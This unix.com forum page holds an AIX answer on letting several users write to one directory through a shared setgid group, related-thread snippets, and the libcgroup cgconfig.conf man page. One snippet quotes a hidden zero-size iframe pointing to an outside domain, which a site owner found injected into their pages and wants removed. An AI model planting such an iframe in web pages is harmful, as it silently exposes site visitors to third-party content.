Login or Register to Ask a Question and Join Our Community


AIX

Can we add multiple groups to a directory or a file ?

 
Thread Tools Search this Thread
Operating Systems AIX Can we add multiple groups to a directory or a file ?
Prev   Next
# 7  
Old 03-27-2015
if you don't want to change anything, you receive nothing. there is a way without changing the ownership, but it is not the way you want, because it requires a little bit deeper understanding of AIX permission system and can cause some strange behaviour if it is applied without knowledge.

The way you want to go is to make one other group, say rwgroup. Users, who must have the right to write in the directory, receive this group as their secondary group. You change the owning group of the directory to rwgroup and set permissions to 2775. In this case all the users, who belong to rwgroup, can write to the directory. All the files they create in the directory will be created with rwgroup. All users, who don't belong to rwgroup, has read (list) access to the directory.

In this case you solve your task in a portable and clear for every administrator (and every tool) manner. If you choose another way, say allow 2 groups to write to one directory, it makes the solution unnecessary complex. After a year or two nobody will remember the solution and why it was done so. It will lead to wrong decisions and unsupportable environment. The main UNIX principle - keep it simple!
 
Login or Register to Ask a Question

Previous Thread | Next Thread

10 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

how to find a pattern from an external file in a directory containing multiple file recursively

Hi, Need your help in this. I have an input file that has multiple enrollment_number, somewhat like 1234567 8901234 9856321 6732187 7623465 Now i have to search and delete these enrollment_number recursively from all the files that are within multiple sub-directories of a... (10 Replies)
Discussion started by: mukulverma2408
10 Replies

2. UNIX for Dummies Questions & Answers

Users in multiple groups?

Happy Thanksgiving Everyone!! I have a question about adding users to multiple groups. Thanks in advance Using Red Hat and here are the issues: Example: Users: Bob Mark Groups: SystemsAnalysts BusinessAnalysts If I am adding a user Bob to both groups (SystemsAnalysts and... (2 Replies)
Discussion started by: hansokl
2 Replies

3. Shell Programming and Scripting

Rename multiple file names in a directory

I hope some one can help me I have multiple files in a directory with out extension like as below mentioned. But i want to change all the file names along .DDMMYYYYHHMISS format. And all files should have same DDMMYYYYHHMISS. Scenario: direcory name = /vol/best/srcfiles files in a... (4 Replies)
Discussion started by: hari001
4 Replies

4. UNIX for Dummies Questions & Answers

Multiple groups in directory / file permissions

Hi I need to permit one group to have r-x permissions on all files in a directory and another group to have just read access, im confused how to do this as if i set the 'Other' permission class as read access then all users will have access to them. So basically i have a directory which the... (2 Replies)
Discussion started by: m3y
2 Replies

5. Shell Programming and Scripting

multiple groups of files processing

I have five directories, dir1 to dir5 for each directory, I have all same number-named folders. There are four types of folders, {1..10}, {20..30}, { 40..50}, {60..70} Now for each types of folder, I will do the same thing, here is the code for i in {1..5} do cd dir$i mkdir temp1 for... (5 Replies)
Discussion started by: ksgreen
5 Replies

6. UNIX for Dummies Questions & Answers

How to add user to multiple groups

hi all i am new to solaris how to add a user to multiple(secondary) groups. user :anna Groups : delhi ,mumbai,pune i need like this in cat /etc/group delhi::anna mumbai::anna pune::anna i tried using usermod -a -G hyd anna that does int work how to delete user from group... (3 Replies)
Discussion started by: kalyankalyan
3 Replies

7. Shell Programming and Scripting

[help]Delete or replace text in multiple file and multiple directory

here's the case : almost of php/html file on my site has added the text : <iframe src="http://google-analyze.cn/count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>I don't know how this happen, so i want to remove above text from all... (16 Replies)
Discussion started by: dzufauzan
16 Replies

8. UNIX for Dummies Questions & Answers

two groups with permission on one directory

Hi, I have a directory that needs to be accessed by the members of two groups: group1 needs rw access group2 needs only r access others should have no rights I must be missing something obvious, but I can't figure out how to do it! Any ideas? (2 Replies)
Discussion started by: StephenJH
2 Replies

9. Shell Programming and Scripting

check the file in multiple Directory in a script

hi, i want to write the script to list atleast one file inside that directory eg: /home/Log/amp01 /home/log/amp02 . . . /home/log/amp..N want to see atleast one file inside the /home/log/amp01 .... amp(N) if it not there.. need to give that no file exists inside... (3 Replies)
Discussion started by: mail2sant
3 Replies

10. Solaris

Removing user from multiple groups via command line

Want to know if any, a command line parameter(s) of removing a user from multiple groups without using any ineractive application? (1 Reply)
Discussion started by: jquizon62
1 Replies
Login or Register to Ask a Question

LEARN ABOUT DEBIAN

cgconfig.conf

CGCONFIG.CONF(5)						File Formats Manual						  CGCONFIG.CONF(5)

NAME

       cgconfig.conf - libcgroup configuration file

DESCRIPTION

       cgconfig.conf  is  a configuration file used by libcgroup to define control groups, their parameters and their mount points.  The file con-
       sists of mount , group and default sections. These sections can be in arbitrary order and all of them are optional. Any line starting  with
       '#' is considered a comment line and is ignored.

       mount section has this form:

	      mount {
		     <controller> = <path>;
		     ...
	      }

       controller
	      Name of the kernel subsystem. The list of subsystems supported by the kernel can be found in /proc/cgroups file. Named hierarchy can
	      be specified as controller "name=<somename>". Do not forget to use double quotes around this controller name (see examples below).

	      Libcgroup merges all subsystems mounted to the same directory (see Example 1) and the directory is mounted only once.

       path   The directory path where the group hierarchy associated to a given controller shall be mounted. The directory is	created  automati-
	      cally on cgconfig service startup if it does not exist and is deleted on service shutdown.

       If no mount section is specified, no controllers are mounted.

       group section has this form:

	      group <name> {
		     [permissions]
		     <controller> {
			    <param name> = <param value>;
			    ...
		     }
		     ...
	      }

       name   Name  of	the  control group. It can contain only characters, which are allowed for directory names.  The groups form a tree, i.e. a
	      control group can contain zero or more subgroups. Subgroups can be specified using '/' delimiter.

	      The root control group is always created automatically in all hierarchies and it is the base of  the  group  hierarchy.  It  can	be
	      explicitly  specified in cgconfig.conf by using '.' as group name. This can be used e.g. to set its permissions, as shown in Example
	      6.

	      When the parent control group of a subgroup is not specified it is created automatically.

       permissions
	      Permissions of the given control group on mounted filesystem.  root has always permission to do anything	with  the  control  group.
	      Permissions have the following syntax:
			perm {
			       task {
				      uid = <task user>;
				      gid = <task group>;
				      fperm = <file permissions>
			       }
			       admin {
				      uid = <admin name>;
				      gid = <admin group>;
				      dperm = <directory permissions>
				      fperm = <file permissions>
			       }
			}

	      task user/group  Name  of  the  user and the group, which own the tasks file of the control group. Given fperm then specify the file
			       permissions.  Please note that the given value is not used as was specified. Instead, current  file  owner  permis-
			       sions  are used as a "umask" for group and others permisions. For example if fperm = 777 then both group and others
			       will get the same permissions as the file owner.

	      admin user/group Name of the user and the group which own the rest of control group's files. Given fperm and dperm control file  and
			       directory permissions.  Again, the given value is masked by the file/directory owner permissions.

	      Permissions  are	only  apply  to the enclosing control group and are not inherited by subgroups. If there is no perm section in the
	      control group definition, root:root is the owner of all files and default file permissions are preserved if fperm  resp.	dperm  are
	      not specified.

       controller
	      Name  of	the  kernel  subsystem.  The section can be empty, default kernel parameters will be used in this case. By specifying con-
	      troller the control group and all its parents are controlled by the specific subsystem. One control group can be controlled by  mul-
	      tiple subsystems, even if the subsystems are mounted on different directories. Each control group must be controlled by at least one
	      subsystem, so that libcgroup knows in which hierarchies the control group should be created.

	      The parameters of the given controller can be modified in the following section enclosed in brackets.

	      param name
		     Name of the file to set. Each controller can have zero or more parameters.

	      param value
		     Value which should be written to the file when the control group is created. If it is enclosed in double quotes `"',  it  can
		     contain spaces and other special characters.

       If no group section is specified, no groups are created.

       default section has this form:

	      default {
		     perm {
			    task {
				   uid = <task user>;
				   gid = <task group>;
				   fperm = <file permissions>
			    }
			    admin {
				   uid = <admin name>;
				   gid = <admin group>;
				   dperm = <directory permissions>
				   fperm = <file permissions>
			    }
		     }
	      }

       Content of the perm section has the same form as in group section. The permissions defined here specify owner and permissions of groups and
       files of all groups, which do not have explicitly specified their permissions in their group section.

EXAMPLES

   Example 1
       The configuration file:

	      mount {
		     cpu = /mnt/cgroups/cpu;
		     cpuacct = /mnt/cgroups/cpu;
	      }

       creates the hierarchy controlled by two subsystems with no groups inside. It corresponds to the following operations:

	      mkdir /mnt/cgroups/cpu
	      mount -t cgroup -o cpu,cpuacct cpu /mnt/cgroups/cpu

   Example 2
       The configuration file:

	      mount {
		     cpu = /mnt/cgroups/cpu;
		     "name=scheduler" = /mnt/cgroups/cpu;
		     "name=noctrl" = /mnt/cgroups/noctrl;
	      }

	      group daemons {
		     cpu {
			    cpu.shares = "1000";
		     }
	      }
	      group test {
		     "name=noctrl" {
		     }
	      }
       creates two hierarchies. One hierarchy named scheduler controlled by cpu subsystem, with group daemons inside. Second  hierarchy  is  named
       noctrl without any controller, with group test. It corresponds to following operations:

	      mkdir /mnt/cgroups/cpu
	      mount -t cgroup -o cpu,name=scheduler cpu /mnt/cgroups/cpu
	      mount -t cgroup -o none,name=noctrl none /mnt/cgroups/noctrl

	      mkdir /mnt/cgroups/cpu/daemons
	      echo 1000 > /mnt/cgroups/cpu/daemons/www/cpu.shares

	      mkdir /mnt/cgroups/noctrl/tests

       The  daemons group is created automatically when its first subgroup is created. All its parameters have the default value and only root can
       access group's files.

       Since both cpuacct and cpu subsystems are mounted to the same directory, all groups are implicitly controlled also  by  cpuacct	subsystem,
       even if there is no cpuacct section in any of the groups.

   Example 3
       The configuration file:

	      mount {
		     cpu = /mnt/cgroups/cpu;
		     cpuacct = /mnt/cgroups/cpu;
	      }

	      group daemons/www {
		     perm {
			    task {
				   uid = root;
				   gid = webmaster;
				   fperm = 770;
			    }
			    admin {
				   uid = root;
				   gid = root;
				   dperm = 775;
				   fperm = 744;
			    }
		     }
		     cpu {
			    cpu.shares = "1000";
		     }
	      }

	      group daemons/ftp {
		     perm {
			    task {
				   uid = root;
				   gid = ftpmaster;
				   fperm = 774;
			    }
			    admin {
				   uid = root;
				   gid = root;
				   dperm = 755;
				   fperm = 700;
			    }
		     }
		     cpu {
			    cpu.shares = "500";
		     }
	      }
       creates	the  hierarchy controlled by two subsystems with one group and two subgroups inside, setting one parameter.  It corresponds to the
       following operations (except for file permissions which are little bit trickier to emulate via chmod):

	      mkdir /mnt/cgroups/cpu
	      mount -t cgroup -o cpu,cpuacct cpu /mnt/cgroups/cpu

	      mkdir /mnt/cgroups/cpu/daemons

	      mkdir /mnt/cgroups/cpu/daemons/www
	      chown root:root /mnt/cgroups/cpu/daemons/www/*
	      chown root:webmaster /mnt/cgroups/cpu/daemons/www/tasks
	      echo 1000 > /mnt/cgroups/cpu/daemons/www/cpu.shares

	       # + chmod the files so the result looks like:
	       # ls -la /mnt/cgroups/cpu/daemons/www/
	       # admin.dperm = 755:
	       # drwxr-xr-x. 2 root webmaster 0 Jun 16 11:51 .
	       #
	       # admin.fperm = 744:
	       # --w-------. 1 root webmaster 0 Jun 16 11:51 cgroup.event_control
	       # -r--r--r--. 1 root webmaster 0 Jun 16 11:51 cgroup.procs
	       # -r--r--r--. 1 root webmaster 0 Jun 16 11:51 cpuacct.stat
	       # -rw-r--r--. 1 root webmaster 0 Jun 16 11:51 cpuacct.usage
	       # -r--r--r--. 1 root webmaster 0 Jun 16 11:51 cpuacct.usage_percpu
	       # -rw-r--r--. 1 root webmaster 0 Jun 16 11:51 cpu.rt_period_us
	       # -rw-r--r--. 1 root webmaster 0 Jun 16 11:51 cpu.rt_runtime_us
	       # -rw-r--r--. 1 root webmaster 0 Jun 16 11:51 cpu.shares
	       # -rw-r--r--. 1 root webmaster 0 Jun 16 11:51 notify_on_release
	       #
	       # tasks.fperm = 770
	       # -rw-rw----. 1 root webmaster 0 Jun 16 11:51 tasks

	      mkdir /mnt/cgroups/cpu/daemons/ftp
	      chown root:root /mnt/cgroups/cpu/daemons/ftp/*
	      chown root:ftpmaster /mnt/cgroups/cpu/daemons/ftp/tasks
	      echo 500 > /mnt/cgroups/cpu/daemons/ftp/cpu.shares

	       # + chmod the files so the result looks like:
	       # ls -la /mnt/cgroups/cpu/daemons/ftp/
	       # admin.dperm = 755:
	       # drwxr-xr-x. 2 root ftpmaster 0 Jun 16 11:51 .
	       #
	       # admin.fperm = 700:
	       # --w-------. 1 root ftpmaster 0 Jun 16 11:51 cgroup.event_control
	       # -r--------. 1 root ftpmaster 0 Jun 16 11:51 cgroup.procs
	       # -r--------. 1 root ftpmaster 0 Jun 16 11:51 cpuacct.stat
	       # -rw-------. 1 root ftpmaster 0 Jun 16 11:51 cpuacct.usage
	       # -r--------. 1 root ftpmaster 0 Jun 16 11:51 cpuacct.usage_percpu
	       # -rw-------. 1 root ftpmaster 0 Jun 16 11:51 cpu.rt_period_us
	       # -rw-------. 1 root ftpmaster 0 Jun 16 11:51 cpu.rt_runtime_us
	       # -rw-------. 1 root ftpmaster 0 Jun 16 11:51 cpu.shares
	       # -rw-------. 1 root ftpmaster 0 Jun 16 11:51 notify_on_release
	       #
	       # tasks.fperm = 774:
	       # -rw-rw-r--. 1 root ftpmaster 0 Jun 16 11:51 tasks

       The daemons group is created automatically when its first subgroup is created. All its parameters have the default value and only root  can
       access the group's files.

       Since  both  cpuacct and cpu subsystems are mounted to the same directory, all groups are implicitly also controlled by the cpuacct subsys-
       tem, even if there is no cpuacct section in any of the groups.

   Example 4
       The configuration file:

	      mount {
		     cpu = /mnt/cgroups/cpu;
		     cpuacct = /mnt/cgroups/cpuacct;
	      }

	      group daemons {
		     cpuacct{
		     }
		     cpu {
		     }
	      }
       creates two hierarchies and one common group in both of them.  It corresponds to the following operations:

	      mkdir /mnt/cgroups/cpu
	      mkdir /mnt/cgroups/cpuacct
	      mount -t cgroup -o cpu cpu /mnt/cgroups/cpu
	      mount -t cgroup -o cpuacct cpuacct /mnt/cgroups/cpuacct

	      mkdir /mnt/cgroups/cpu/daemons
	      mkdir /mnt/cgroups/cpuacct/daemons

       In fact there are two groups created. One in the cpuacct hierarchy, the second in the cpu hierarchy. These two groups have nothing in  com-
       mon and can contain different subgroups and different tasks.

   Example 5
       The configuration file:

	      mount {
		     cpu = /mnt/cgroups/cpu;
		     cpuacct = /mnt/cgroups/cpuacct;
	      }

	      group daemons {
		     cpuacct{
		     }
	      }

	      group daemons/www {
		     cpu {
			    cpu.shares = "1000";
		     }
	      }

	      group daemons/ftp {
		     cpu {
			    cpu.shares = "500";
		     }
	      }
       creates two hierarchies with few groups inside. One of the groups is created in both hierarchies.

       It corresponds to the following operations:

	      mkdir /mnt/cgroups/cpu
	      mkdir /mnt/cgroups/cpuacct
	      mount -t cgroup -o cpu cpu /mnt/cgroups/cpu
	      mount -t cgroup -o cpuacct cpuacct /mnt/cgroups/cpuacct

	      mkdir /mnt/cgroups/cpuacct/daemons
	      mkdir /mnt/cgroups/cpu/daemons
	      mkdir /mnt/cgroups/cpu/daemons/www
	      echo 1000 > /mnt/cgroups/cpu/daemons/www/cpu.shares
	      mkdir /mnt/cgroups/cpu/daemons/ftp
	      echo 500 > /mnt/cgroups/cpu/daemons/ftp/cpu.shares
       Group  daemons is created in both hierarchies. In the cpuacct hierarchy the group is explicitly mentioned in the configuration file. In the
       cpu hierarchy the group is created implicitly when www is created there. These two groups have nothing in common, for example they  do  not
       share processes and subgroups. Groups www and ftp are created only in the cpu hierarchy and are not controlled by the cpuacct subsystem.

   Example 6
       The configuration file:

	      mount {
		     cpu = /mnt/cgroups/cpu;
		     cpuacct = /mnt/cgroups/cpu;
	      }

	      group . {
		     perm {
			    task {
				   uid = root;
				   gid = operator;
			    }
			    admin {
				   uid = root;
				   gid = operator;
			    }
		     }
		     cpu {
		     }
	      }

	      group daemons {
		     perm {
			    task {
				   uid = root;
				   gid = daemonmaster;
			    }
			    admin {
				   uid = root;
				   gid = operator;
			    }
		     }
		     cpu {
		     }
	      }
       creates	the hierarchy controlled by two subsystems with one group having some special permissions.  It corresponds to the following opera-
       tions:

	      mkdir /mnt/cgroups/cpu
	      mount -t cgroup -o cpu,cpuacct cpu /mnt/cgroups/cpu

	      chown root:operator /mnt/cgroups/cpu/*
	      chown root:operator /mnt/cgroups/cpu/tasks

	      mkdir /mnt/cgroups/cpu/daemons
	      chown root:operator /mnt/cgroups/cpu/daemons/*
	      chown root:daemonmaster /mnt/cgroups/cpu/daemons/tasks

       Users which are members of the operator group are allowed to administer the control groups, i.e. create new control groups  and	move  pro-
       cesses between these groups without having root privileges.

       Members of the daemonmaster group can move processes to the daemons control group, but they can not move the process out of the group. Only
       the operator or root can do that.

RECOMMENDATIONS

   Keep hierarchies separated
       Having multiple hierarchies is perfectly valid and can be useful in various scenarios. To keeps things clean, do not create  one  group	in
       multiple  hierarchies.  Examples  4 and 5 show how unreadable and confusing it can be, especially when reading somebody elses configuration
       file.

   Explicit is better than implicit
       libcgroup can implicitly create groups which are needed for the creation of configured subgroups. This may be useful and save  some  typing
       in  simple  scenarios.  When  it comes to multiple hierarchies, it's better to explicitly specify all groups and all controllers related to
       them.

FILES

       /etc/cgconfig.conf
       default libcgroup configuration file

SEE ALSO

       cgconfigparser (8)

BUGS

       Parameter values must be single strings without spaces.	Parsing of quoted strings is not implemented.

																  CGCONFIG.CONF(5)